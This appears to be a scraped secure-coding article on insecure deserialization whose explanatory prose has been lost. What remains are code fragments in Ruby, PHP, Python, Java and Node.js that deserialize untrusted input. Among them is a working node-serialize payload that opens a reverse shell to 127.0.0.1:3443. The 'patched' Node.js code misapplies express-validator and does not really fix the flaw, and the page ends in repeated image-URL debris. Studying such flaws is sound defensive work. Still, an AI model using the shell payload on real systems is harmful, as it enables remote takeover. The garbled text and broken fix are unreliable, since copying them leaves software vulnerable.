GET A DEMO
Insecure Deserialization
Secure CodingAppSecInsecure Deserialization
end
with_response response do |resp|
owners = YAML.load resp.body
say "Owners for gem: #{name}"
owners.each do |owner|
function _validatePost(&$controller) {
-- snip --
$check = $controller->data;
$token = urldecode($check['_Token']['fields']);
if (strpos($token, ':')) {
list ($token, $locked) = explode( ':', $token, 2 );
}
$locked = unserialize(str_rot13($locked));
-- snip --
suffix=self._fs_transaction_suffix, dir=self._path
)
with os.fdopen(fd, "wb") as f:
pickle.dump(timeout, f, 1)
pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
os.replace(tmp, filename)
os.chmod(filename, self._mode)
except (IOError, OSError) as exc:
@RequestMapping("/impsave")
@Menu(type = "admin" , subtype = "template" , access = false , admin = true)
public ModelAndView impsave (ModelMap map , HttpServletRequest
request @RequestParam(value = "dataFile", required = false ) MultipartFile dataFile)
throws Exception {
if(dataFile!=null && dataFile.getSize() > 0){
List<Template> templateList = (List<Template>) MainUtils.toObject(dataFile.getBytes()) ;
if(templateList!=null && templateList.size() > 0){
templateRes.deleteInBatch(templateList);
for(Template template : templateList){
templateRes.save(template) ;
}
}
}
return request(super.createView("redirect:/admin/template/index.html"));
}
public static Object toObject(byte[] data) throws Exception {
ByteArrayInputStream input = new ByteArrayInputStream(data);
ObjectInputStream objectInput = new ObjectInputStream(input);
return objectInput.readObject();
}
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();
app.use(cookieParser())
app.get('/', function(req, res) {
if (req.cookies.profile) {
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
if (obj.username) {
res.send( "Hello " + escape(obj.username));
}
} else {
res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
maxAge: 900000,
httpOnly: true
});
res.send("Hello stranger");
}
});
app.listen(3000);
res.send("Hello stranger");
{"username":"admin","company":"kondukto","location":"cloudbank"}
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
if (obj.username) {
res.send("Hello " + escape(obj.username));
}
{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"3443\";
TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') {
String.prototype.contains = function(it) { return this.indexOf(it) != -1;
}; } function c(HOST, PORT) { var client = new net.Socket();
client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
client.write(\"Connected!\"); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
function(code, signal) { client.end(\"Disconnected!\"); }); });
client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
c(HOST, PORT);}( )"}
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
const { check } = require('express-validator');
var app = express();
app.use(cookieParser())
app.get('/', function(req, res) {
if (req.cookies.profile) {
var str = new Buffer(req.cookies.profile, 'base64').toString();
var patched = check(str).isString().escape().trim();
var obj = serialize.unserialize(patched);
if (obj) {
res.send( "Hello " + escape(obj));
}
} else {
res.cookie('profile', "eyJ1c2VybmFtZSI6ImFkbWluIiwiY29tcGFueSI6ImtvbmR1a3RvIiwibG9jYXRpb24iOiJjbG91ZGJhbmsifQ==" , {
maxAge: 900000,
httpOnly: true
});
res.send("Hello stranger");
}
});
app.listen(3000);
const { check } = require('express-validator');
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30)){kind=logo}
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))